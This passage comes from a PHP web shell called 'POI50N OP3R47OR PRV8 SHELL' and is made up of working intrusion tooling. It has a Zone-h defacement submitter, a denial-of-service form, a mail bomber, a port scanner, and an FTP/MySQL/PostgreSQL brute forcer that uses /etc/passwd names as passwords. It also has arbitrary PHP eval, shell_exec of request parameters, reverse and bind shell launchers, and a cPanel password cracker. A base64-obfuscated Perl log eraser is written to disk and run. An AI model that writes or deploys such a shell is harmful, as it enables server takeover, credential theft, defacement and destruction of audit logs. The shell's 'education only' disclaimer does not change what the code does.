4975 else if(isset($_GET["zone"]))
4976 {
4977 if(!function_exists('curl_version'))
4978 {
4979 echo "<pre style='margin-top:5px'><center><font >PHP CURL NOT EXIST</font></center></pre>";
4980 }
4981 ?>
4982 <center><font size="4">Zone-h Poster</font></center>
4983 <form action="<?php echo $self; ?>" method="post">
4984 <table align="center" cellpadding="5" border="0">
4985 <tr>
4986 <td>
4987 <input type="text" name="defacer" value="Attacker" class="box" /></td></tr>
4988 <tr><td>
4989 <select name="hackmode" class="box">
4990 <option >--------SELECT--------</option>
4991 <option value="1">known vulnerability (i.e. unpatched system)</option>
4992 <option value="2" >undisclosed (new) vulnerability</option>
4993 <option value="3" >configuration / admin. mistake</option>
4994 <option value="4" >brute force attack</option>
4995 <option value="5" >social engineering</option>
4996 <option value="6" >Web Server intrusion</option>
4997 <option value="7" >Web Server external module intrusion</option>
4998 <option value="8" >Mail Server intrusion</option>
4999 <option value="9" >FTP Server intrusion</option>
5000 <option value="10" >SSH Server intrusion</option>
5001 <option value="11" >Telnet Server intrusion</option>
5002 <option value="12" >RPC Server intrusion</option>
5003 <option value="13" >Shares misconfiguration</option>
5004 <option value="14" >Other Server intrusion</option>
5005 <option value="15" >SQL Injection</option>
5006 <option value="16" >URL Poisoning</option>
5007 <option value="17" >File Inclusion</option>
5008 <option value="18" >Other Web Application bug</option>
5009 <option value="19" >Remote administrative panel access bruteforcing</option>
5010 <option value="20" >Remote administrative panel access password guessing</option>
5011 <option value="21" >Remote administrative panel access social engineering</option>
5012 <option value="22" >Attack against administrator(password stealing/sniffing)</option>
5013 <option value="23" >Access credentials through Man In the Middle attack</option>
5014 <option value="24" >Remote service password guessing</option>
5015 <option value="25" >Remote service password bruteforce</option>
5016 <option value="26" >Rerouting after attacking the Firewall</option>
5017 <option value="27" >Rerouting after attacking the Router</option>
5018 <option value="28" >DNS attack through social engineering</option>
5019 <option value="29" >DNS attack through cache poisoning</option>
5020 <option value="30" >Not available</option>
5021 </select>
5022 </td></tr>
5023 <tr><td>
5024 <select name="reason" class="box">
5025 <option >--------SELECT--------</option>
5026 <option value="1" >Heh...just for fun!</option>
5027 <option value="2" >Revenge against that website</option>
5028 <option value="3" >Political reasons</option>
5029 <option value="4" >As a challenge</option>
5030 <option value="5" >I just want to be the best defacer</option>
5031 <option value="6" >Patriotism</option>
5032 <option value="7" >Not available</option>
5033 </select></td></tr>
5034 <tr><td>
5035 <textarea name="domain" class="box" cols="47" rows="9">List Of Domains</textarea></td></tr>
5036 <tr><td>
5037 <input type="button" onClick="zoneh(defacer.value,hackmode.value,reason.value,domain.value)" class="but" value="Send Now !" /></td></tr></table>
5038 </form><div id="showzone"></div>
5039 <?php }
5040//DDos
5041 else if(isset($_GET['dos']))
5042 {
5043 ?>
5044 <form method="GET">
5045 <table id="margins">
5046 <tr>
5047 <td width="400" class="title">
5048 IP
5049 </td>
5050 <td>
5051 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
5052 </td>
5053 </tr>
5054
5055 <tr>
5056 <td class="title">
5057 Port
5058 </td>
5059 <td>
5060 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
5061 </td>
5062 </tr>
5063
5064 <tr>
5065 <td class="title">
5066 Timeout <font >(Time in seconds)</font>
5067 </td>
5068 <td>
5069 <input type="text" class="box" name="timeout" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';" />
5070 </td>
5071 </tr>
5072 <tr>
5073 <td class="title">
5074 Execution Time <font >(Time in seconds)</font>
5075 </td>
5076 <td>
5077 <input type="text" class="box" name="exTime" value="10" onFocus="if(this.value == '10')this.value = '';" onBlur="if(this.value=='')this.value='10';"/>
5078 </td>
5079 </tr>
5080 <tr>
5081 <td class="title">
5082 No of Bytes per/packet
5083 </td>
5084 <td>
5085 <input type="text" class="box" name="noOfBytes" value="999999" onFocus="if(this.value == '999999')this.value = '';" onBlur="if(this.value=='')this.value='999999';"/>
5086 </td>
5087 </tr>
5088 <tr>
5089 <td rowspan="2">
5090 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('dosser',myip.value,port.value,timeout.value,exTime.value,noOfBytes.value,'null')" class="but" value=" > Fuck < "/>
5091 </td>
5092 </tr>
5093 </table>
5094 </form><div id="showdos"></div>
5095 <?php
5096}
5097else if(isset($_GET['mailbomb']))
5098{ ?>
5099 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('bomb')"><font class=txt size="4">| Mail Bomber |</font></a></td>
5100 <td><a href=javascript:void(0) onClick="getdata('mail')"><font class=txt size="4">| Mass Mailer |</font></a></td></tr></table></center><br><div id=showdata></div>
5101<?php
5102}
5103else if(isset($_GET['tools']))
5104 {
5105 ?>
5106 <center><br><form onSubmit="getport(host.value,protocol.value);return false;">
5107 <table cellpadding="5" border="3" style="border-color:#333333; width:50%;">
5108 <tr>
5109 <td colspan="2" align="center"><b><font size='4'>Port Scanner<br></font></b></td>
5110 </tr>
5111 <tr>
5112 <td align="center">
5113 <input class="sbox" type='text' name='host' value='<?php echo $_SERVER["SERVER_ADDR"]; ?>' >
5114 </td>
5115 <td align="center">
5116 <select class="sbox" name='protocol'>
5117 <option value='tcp'>tcp</option>
5118 <option value='udp'>udp</option>
5119 </select>
5120 </td>
5121 <tr>
5122 <td colspan="2" align="center"><input class="but" type='button' onClick="getport(host.value,protocol.value)" value='Scan Ports'></td>
5123 </tr>
5124 </form>
5125 <tr><td colspan=2><div id="showports"></div>
5126 </td></tr></table>
5127
5128 <br>
5129 <form onSubmit="bruteforce(prototype.value,serverport.value,login.value,dict.value);return false;">
5130 <table cellpadding="5" border="2" style="border-color:#333333; width:50%;">
5131 <tr>
5132 <td colspan="2" align="center"><font size="4">BruteForce</font></td>
5133 </tr>
5134 <tr>
5135 <td>Type : </td>
5136 <td>
5137 <select name="prototype" class="sbox">
5138 <option value="ftp">FTP</option>
5139 <option value="mysql">MYSQL</option>
5140 <option value="postgresql">PostgreSql</option>
5141 </select>
5142 </td>
5143 </tr>
5144 <tr>
5145 <td>Server <b>:</b> Port : </td>
5146 <td><input type="text" name="serverport" value="<?php echo $_SERVER["SERVER_ADDR"]; ?>" class="sbox"></td>
5147 </tr>
5148 <tr>
5149 <td valign="middle">Brute type : </td>
5150 <td><label><input type=radio name=mytype value="1" checked> /etc/passwd</label><label><input type=checkbox id="reverse" name=reverse value=1 checked> reverse (login -> nigol)</label><hr color="#1B1B1B">
5151 <label><input type=radio name=mytype value="2"> Dictionary</label><br>
5152 Login : <input type="text" name="login" value="root" class="sbox"><br>
5153 Dictionary : <input type="text" name="dict" value="<?php echo getcwd() . $directorysperator; ?>passwd.txt" class="sbox">
5154 </td>
5155 </tr>
5156 <tr>
5157 <td colspan="2" align="center"><input type="button" onClick="bruteforce(prototype.value,serverport.value,login.value,dict.value)" value="Attack >>" class="but"></td>
5158 </tr>
5159 </form><tr><td colspan="2" id="showbrute"></td></tr>
5160 </table>
5161 </center><br>
5162 <?php
5163}
5164else if (isset($_GET["phpc"]))
5165{
5166 ?>
5167 <div id="showresult"></div>
5168 <form name="frm">
5169 <textarea name="code" class="box" cols="120" rows="10">phpinfo();</textarea>
5170 <br /><br />
5171 <input name="submit" value="Execute This COde! " class="but" onClick="execode(code.value)" type="button" />
5172 <label><input type="checkbox" id="intext" name="intext" value="disp"> <font class=txt size="3">Display in Textarea</font></label>
5173 </form>
5174 <?php
5175}
5176else if(isset($_GET["exploit"]))
5177{
5178 if(!isset($_GET["rootexploit"]))
5179 {
5180 ?>
5181 <center>
5182 <form action="<?php echo $self; ?>" method="get" target="_blank">
5183 <input type="hidden" name="exploit">
5184 <table border="1" cellpadding="5" cellspacing="4" style="width:50%;border-color:#333333;">
5185 <tr>
5186 <td style="height:60px;">
5187 <font size="4" class=txt>Select Website</font></td><td>
5188 <p><select id="rootexploit" name="rootexploit" class="box">
5189 <option value="exploit-db">Exploit-db</option>
5190 <option value="packetstormsecurity">Packetstormsecurity</option>
5191 <option value="exploitsearch">Exploitsearch</option>
5192 <option value="shodanhq">Shodanhq</option>
5193 </select></p></td></tr><tr><td colspan="2" align="center" style="height:40px;">
5194 <input type="submit" value="Search" class="but"></td></tr></table>
5195 </form></center><br>
5196
5197 <?php
5198 }
5199 else
5200 {
5201 //exploit search
5202 $Lversion = php_uname(r);
5203 $OSV = php_uname(s);
5204 if(eregi('Linux',$OSV))
5205 {
5206 $Lversion=substr($Lversion,0,6);
5207 if($_GET['rootexploit'] == "exploit-db")
5208 {
5209 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$Lversion&filter_exploit_text=&filter_author=&filter_platform=16&filter_type=2&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=");
5210 }
5211 else if($_GET['rootexploit'] == "packetstormsecurity")
5212 {
5213 header("Location:http://www.packetstormsecurity.org/search/?q=Linux+Kernel+$Lversion");
5214 }
5215 else if($_GET['rootexploit'] == "exploitsearch")
5216 {
5217 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=Linux+Kernel+$Lversion");
5218 }
5219 else if($_GET['rootexploit'] == "shodanhq")
5220 {
5221 header("Location:https://exploits.shodan.io/?q=$Lversion+platform:\"linux\"");
5222 }
5223 }
5224 else
5225 {
5226 $Lversion=substr($Lversion,0,3);
5227 if($_GET['rootexploit'] == "exploit-db")
5228 {
5229 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$OSV&filter_exploit_text=&filter_author=&filter_platform=16&filter_type=2&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=");
5230 }
5231 else if($_GET['rootexploit'] == "packetstormsecurity")
5232 {
5233 header("Location:http://www.packetstormsecurity.org/search/?q=$OSV+Lversion");
5234 }
5235 else if($_GET['rootexploit'] == "exploitsearch")
5236 {
5237 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=$OSV+Lversion");
5238 }
5239 else if($_GET['rootexploit'] == "shodanhq")
5240 {
5241 header("Location:https://exploits.shodan.io/?q=$OSV+platform:\"windows\"");
5242 }
5243 }
5244 //End of Exploit search
5245 }
5246}
5247// Connect
5248else if(isset($_REQUEST['connect']))
5249{
5250 ?>
5251 <form action='<?php echo $self; ?>' method='POST' >
5252 <table style="width:50%" align="center" >
5253 <tr>
5254 <th colspan="1" width="50px">Reverse Shell</th>
5255 <th colspan="1" width="50px">Bind Shell</th>
5256 </tr>
5257 <tr>
5258 <td>
5259 <table style="border-spacing: 6px;">
5260 <tr>
5261 <td>IP </td>
5262 <td>
5263 <input type="text" class="box" style="width: 200px;" name="ip" value="<?php yourip();?>" />
5264 </td>
5265 </tr>
5266 <tr>
5267 <td>Port </td>
5268 <td><input style="width: 200px;" class="box" name="port" size='5' value="9891"/></td>
5269 </tr>
5270 <tr>
5271 <td style="vertical-align:top;">Use:</td>
5272 <td><select style="width: 95px;" name="lang" class="sbox">
5273 <option value="perl">Perl</option>
5274 <option value="python">Python</option>
5275 <option value="php">PHP</option>
5276 </select>
5277 <input type="submit" style="width: 90px;" class="but" value="Connect!" name="backconnect"/></td>
5278 </tr>
5279 </table> </form>
5280 </td>
5281
5282 <td style="vertical-align:top;">
5283 <form method='post' >
5284 <table style="border-spacing: 6px;">
5285 <tr>
5286 <td>Port</td>
5287 <td>
5288 <input style="width: 200px;" class="box" name="port" value="9891" />
5289 </td>
5290 </tr>
5291 <tr>
5292 <td>Password </td>
5293 <td>
5294 <input style="width: 200px;" class="box" name="passwd" value="Dhanush"/>
5295 </td>
5296 <tr>
5297 <td>Using</td>
5298 <td>
5299 <select style="width: 95px;" name="lang" id="lang" class="sbox">
5300 <option value="perl">Perl</option>
5301 <option value="c">C</option>
5302 </select>
5303 <input style="width: 90px;" class="but" type="submit" name="backdoor" value=" Bind "/></td>
5304 </tr>
5305 </table>
5306 </td>
5307 </form>
5308 </tr>
5309 <tr><td colspan=2>Click "Connect" only after open port for it.Use NetCat, run "nc -l -n -v -p 9891"!<br>Click "Bind", use netcat and give it the command 'nc <?php yourip(); ?> 9891"!</td></tr>
5310 </table>
5311
5312 <?php
5313 }
5314else if(isset($_REQUEST['subdomain']))
5315{
5316 ?>
5317 <center><form>
5318 <table>
5319 <tr>
5320 <td>Cpanel user : </td>
5321 <td><input type="text" name="cpaneluser" value="<?php echo get_current_user(); ?>" class="box" /></td>
5322 </tr>
5323 <tr>
5324 <td>Cpanel password : </td>
5325 <td><input type="password" name="cpanelpass" class="box" /></td>
5326 </tr>
5327 <tr>
5328 <td>Number of Subdomain : </td>
5329 <td><input type="text" name="noofsubdomain" class="box" value="10" /></td>
5330 </tr>
5331 <tr>
5332 <td valign="top">Index : </td>
5333 <td><textarea rows="7" cols="54" name="subindex" class="box">POI50N OP3R470R WAS HERE !!!!!</textarea></td>
5334 </tr>
5335 <tr>
5336 <td></td>
5337 <td><input type="button" value=" go " class="but" onClick="createsubdomain(cpaneluser.value,cpanelpass.value,noofsubdomain.value,subindex.value)" /></td>
5338 </tr>
5339 </table></center></form><br>
5340 <div id="showmydata"></div>
5341 <?php
5342}
5343else if(isset($_REQUEST['404']))
5344{
5345 ?>
5346 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('404new')"><font class=txt size="4">| Set Your 404 Page |</font></a></td>
5347 <td><a href=javascript:void(0) onClick="getdata('404page')"><font class=txt size="4">| Set Specified 404 Page |</font></a></td>
5348 </tr></table></center><br>
5349 <div id="showdata"></div>
5350 <?php
5351}
5352else if(isset($_GET['about']))
5353 { ?>
5354 <center>
5355 <p><font size=6><u>POI50N OP3R47OR PRV8 SHELL</u></font><br>
5356 <font size=5>CODED BY <a href="http://facebook.com/anju.root">POI50N OP3R47OR & <a href="http://facebook.com/blackhats.07"> TH3-D357ROY3R</a></font>
5357 <div style='font-family: Courier New; font-size: 10px;'><font class=txt ><pre>
5358
5359
5360
5361,------. ,-----.,--,-----. ,--. ,--. ,--. ,-----.,------.,----.,------. ,---,-----.,-----.,------.
5362| .--. ' .-. | | .--'/ \| ,'.| | ' .-. | .--. '.-. | .--. '/ '--, ' .-. | .--. '
5363| '--' | | | | '--. `| () | |' ' | | | | | '--' | .' <| '--'./ ' |.' /| | | | '--'.'
5364| | --'' '-' | .--' /\ /| | ` | ' '-' | | --'/'-' | |\ \'--| / / ' '-' | |\ \
5365`--' `-----'`--`----' `--' `--' `--' `-----'`--' `----'`--' '--' `--`--' `-----'`--' '--'
5366
5367 ]|I{•-------------------------» BREAK THE SYSTEM WHEN ACCESS DENIED «---------------------------•}I|[
5368
5369
5370 </pre></font></div></center>
5371 <font class="om">This Shell is created for checking the vulnerability and security of any web server or website. <br> This shell provides you almost every facility that the security analyst need for penetration testing. <br> This script is only coded for education purpose or testing on your own server. <br> The developers of the script is not responsible for any damage or misuse of it.<br> Where there is a shell there is a way </font><br><br><center><font size=5>GREETS TO : <a href="http://facebook.com/734M.H5H"> HELL SHIELD HACKERS </font></center><br>
5372 <?php }
5373else if(isset($_GET['database']))
5374{ ?>
5375 <form onSubmit="mydatabase(server.value,username.value,password.value);return false;">
5376 <table id="datatable" style="width:90%;" cellpadding="4" align="center">
5377 <tr>
5378 <td colspan="2">Connect To Database</td>
5379 </tr>
5380 <tr>
5381 <td>Server Address :</td>
5382 <td><input type="text" class="box" name="server" value="localhost"></td>
5383 </tr>
5384 <tr>
5385 <td>Username :</td>
5386 <td><input type="text" class="box" name="username" value="root"></td>
5387 </tr>
5388 <tr>
5389 <td>Password:</td>
5390 <td><input type="text" class="box" name="password" value=""></td>
5391 </tr>
5392
5393 <tr>
5394 <td></td>
5395 <td><input type="button" onClick="mydatabase(server.value,username.value,password.value)" value=" Connect " name="executeit" class="but"></td>
5396 </tr>
5397 </table>
5398 </form>
5399 <div id="showsql"></div>
5400<?php
5401}
5402// Cpanel Cracker
5403 else if(isset($_REQUEST['cpanel']))
5404 {
5405 $cpanel_port="2082";
5406 $connect_timeout=5;
5407 ?>
5408 <center>
5409 <form method=post>
5410 <table class="btmtbl" style="width:50%;" border=1 cellpadding=4>
5411 <tr>
5412 <td align=center>User names</td><td align=center>Password</td>
5413 </tr>
5414 <tr>
5415 <td align=center><textarea name=username rows=25 cols=22 class=box><?php
5416 if($os != "Windows")
5417 {
5418 if(@file('/etc/passwd'))
5419 {
5420 $users = file('/etc/passwd');
5421 foreach($users as $user)
5422 {
5423 $user = explode(':', $user);
5424 echo $user[0] . "\n";
5425 }
5426 }
5427 else
5428 {
5429 $temp = "";
5430 $val1 = 0;
5431 $val2 = 1000;
5432 for(;$val1 <= $val2;$val1++)
5433 {
5434 $uid = @posix_getpwuid($val1);
5435 if ($uid)
5436 $temp .= join(':',$uid)."\n";
5437 }
5438
5439 $temp = trim($temp);
5440
5441 if($file5 = fopen("test.txt","w"))
5442 {
5443 fputs($file5,$temp);
5444 fclose($file5);
5445
5446 $file = fopen("test.txt", "r");
5447 while(!feof($file))
5448 {
5449 $s = fgets($file);
5450 $matches = array();
5451 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
5452 $matches = str_replace("home/","",$matches[1]);
5453 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
5454 continue;
5455 echo $matches;
5456 }
5457 fclose($file);
5458 }
5459 }
5460 }
5461
5462 ?></textarea></td><td align=center><textarea name=password rows=25 cols=22 class=box></textarea></td>
5463 </tr>
5464 <tr>
5465 <td align=center colspan=2><input type="submit" name="cpanelattack" value=" Go " class=but></td>
5466 </tr>
5467 </table>
5468 </form>
5469 </center>
5470 <?php
5471}
5472else if(isset($_REQUEST['malattack']))
5473{
5474 ?><input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
5475 <center><table><tr><td><a href=# onClick="getdata('malware')"><font class=txt size="4">| Malware Attack |</font></a></td>
5476 <td><a href=# onClick="getdata('codeinsert')"><font class=txt size="4">| Insert Own Code |</font></a></td></tr></table></center><br>
5477 <div id="showdata"></div>
5478 <?php
5479}
5480else if(isset($_GET["com"]))
5481{
5482 echo "<br>";
5483 ob_start();
5484 eval("phpinfo();");
5485 $b = ob_get_contents();
5486 ob_end_clean();
5487 $a = strpos($b,"<body>")+6; // yeah baby,, your body is wonderland ;-)
5488 $z = strpos($b,"</body>");
5489 $s_result = "<div class='myphp'>".substr($b,$a,$z-$a)."</div>";
5490 echo $s_result;
5491}
5492else if(isset($_GET['execute']))
5493{
5494 $comm = $_GET['execute'];
5495 chdir($_GET['executepath']);
5496 $check = shell_exec($comm);
5497
5498 echo "<BR><center><textarea id=showexecute cols=100 rows=20 class=box>" . $check . "</textarea></center>";
5499
5500 ?>
5501 <BR><BR><center><form onSubmit="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value);return false;">
5502 <input type="text" class="box" name="execute">
5503 <input type="button" onClick="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value)" value="Execute" class="but">
5504 <input type="button" onClick="cancel()" value="cancel" class="but" /></form></center><BR>
5505 <?php
5506}
5507else if(isset($_GET['mycmd']))
5508{
5509 if($_GET['mycmd']=="logeraser")
5510 {
5511 $erase = gzinflate(base64_decode("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"));
5512 if(is_writable("."))
5513 {
5514 if($openp = fopen(getcwd()."/logseraser.pl", 'w'))
5515 {
5516 fwrite($openp, $erase);
5517 fclose($openp);
5518 passthru("perl logseraser.pl linux");
5519 unlink("logseraser.pl");
5520 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
5521 }
5522 } else
5523 {
5524 if($openp = fopen("/tmp/logseraser.pl", 'w'))
5525 {
5526 fwrite($openp, $erase)or die("Error");
5527 fclose($openp);
5528 $aidx = passthru("perl logseraser.pl linux");
5529 unlink("logseraser.pl");
5530 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
5531 }
5532 }
5533 }
5534 else
5535 {
5536 $check = shell_exec($_GET['mycmd']);
5537 echo "<center><textarea cols=120 rows=20 class=box>" . $check . "</textarea></center>";
5538
5539 }
5540}
5541else if(isset($_GET['prototype']))
5542{
5543 echo '<h1>Results</h1><div><span>Type:</span> '.htmlspecialchars($_GET['prototype']).' <span><br>Server:</span> '.htmlspecialchars($_GET['serverport']).'<br>';
5544 if( $_GET['prototype'] == 'ftp' )
5545 {
5546 function BruteFun($ip,$port,$login,$pass)
5547 {
5548 $fp = @ftp_connect($ip, $port?$port:21);
5549 if(!$fp) return false;
5550 $res = @ftp_login($fp, $login, $pass);
5551 @ftp_close($fp);
5552 return $res;
5553 }
5554 }
5555 elseif( $_GET['prototype'] == 'mysql' )
5556 {
5557 function BruteFun($ip,$port,$login,$pass)
5558 {
5559 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
5560 @mysql_close($res);
5561 return $res;
5562 }
5563 }
5564 elseif( $_GET['prototype'] == 'pgsql' )
5565 {
5566 function BruteFun($ip,$port,$login,$pass)
5567 {
5568 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
5569 $res = @pg_connect($str);
5570 @pg_close($res);
5571 return $res;
5572 }
5573 }
5574
5575 $success = 0;
5576 $attempts = 0;
5577 $server = explode(":", $_GET['server']);
5578
5579 if($_GET['type'] == 1)
5580 {
5581 $temp = @file('/etc/passwd');
5582 if( is_array($temp))
5583 foreach($temp as $line)
5584 {
5585 $line = explode(":", $line);
5586 ++$attempts;
5587 if(BruteFun(@$server[0],@$server[1], $line[0], $line[0]) )
5588 {
5589 $success++;
5590 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
5591 }
5592 if(@$_GET['reverse'])
5593 {
5594 $tmp = "";
5595 for($i=strlen($line[0])-1; $i>=0; --$i)
5596 $tmp .= $line[0][$i];
5597 ++$attempts;
5598 if(BruteFun(@$server[0],@$server[1], $line[0], $tmp) )
5599 {
5600 $success++;
5601 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
5602 }
5603 }
5604 }
5605 }
5606 elseif($_GET['type'] == 2)
5607 {
5608 $temp = @file($_GET['dict']);
5609 if( is_array($temp) )
5610 foreach($temp as $line)
5611 {
5612 $line = trim($line);
5613 ++$attempts;
5614 if(BruteFun($server[0],@$server[1], $_GET['login'], $line) )
5615 {
5616 $success++;
5617 echo '<b>'.htmlspecialchars($_GET['login']).'</b>:'.htmlspecialchars($line).'<br>';
5618 }
5619 }
5620 }
5621 echo "<span>Attempts:</span> <font class=txt>$attempts</font> <span>Success:</span> <font class=txt>$success</font></div>";
5622}
5623// Execute Query
5624else if(isset($_GET["executeit"]))
5625{
5626 if(isset($_GET['username']) && isset($_GET['server']))
5627 {
5628 $dbserver = $_GET['server'];
5629 $dbuser = $_GET['username'];
5630 $dbpass = $_GET['password'];
5631 if(mysql_connect($dbserver,$dbuser,$dbpass))
5632 {
5633 setcookie("dbserver", $dbserver);
5634 setcookie("dbuser", $dbuser);
5635 setcookie("dbpass", $dbpass);
5636
5637 listdatabase();
5638 }
5639 else
5640 echo "cannotconnect";
5641 }
5642}
5643else if(isset($_GET['action']) && isset($_GET['dbname']))
5644
5645
5646 {
5647 if($_GET['action'] == "createDB")
5648 {
5649 $dbname = $_GET['dbname'];
5650 $dbserver = $_COOKIE["dbserver"];
5651 $dbuser = $_COOKIE["dbuser"];
5652 $dbpass = $_COOKIE["dbpass"];
5653 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
5654 mysql_query("create database $dbname",$mysqlHandle);
5655 listdatabase();
5656 }
5657 if($_GET['action'] == 'dropDB')
5658 {
5659 $dbname = $_GET['dbname'];
5660 $dbserver = $_COOKIE["dbserver"];
5661 $dbuser = $_COOKIE["dbuser"];
5662 $dbpass = $_COOKIE["dbpass"];
5663 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
5664 mysql_query("drop database $dbname",$mysqlHandle);
5665 mysql_close($mysqlHandle);
5666 listdatabase();
5667 }
5668
5669 if($_GET['action'] == 'listTables')
5670 {
5671 listtable();
5672 }
5673
5674 // Create Tables
5675 if($_GET['action'] == "createtable")
5676 {
5677 $dbserver = $_COOKIE["dbserver"];
5678 $dbuser = $_COOKIE["dbuser"];
5679 $dbpass = $_COOKIE["dbpass"];
5680 $dbname = $_GET['dbname'];
5681 $tablename = $_GET['tablename'];
5682 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5683 mysql_select_db($dbname);
5684 mysql_query("CREATE TABLE $tablename ( no INT )");
5685 listtable();
5686 }
5687
5688 // Drop Tables
5689 if($_GET['action'] == "dropTable")
5690 {
5691 $dbserver = $_COOKIE["dbserver"];
5692 $dbuser = $_COOKIE["dbuser"];
5693 $dbpass = $_COOKIE["dbpass"];
5694 $dbname = $_GET['dbname'];
5695 $tablename = $_GET['tablename'];
5696 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5697 mysql_select_db($dbname);
5698 mysql_query("drop table $tablename");
5699 listtable();
5700 }
5701
5702 // Empty Tables
5703 if($_GET['action'] == "empty")
5704 {
5705 $dbserver = $_COOKIE["dbserver"];
5706 $dbuser = $_COOKIE["dbuser"];
5707 $dbpass = $_COOKIE["dbpass"];
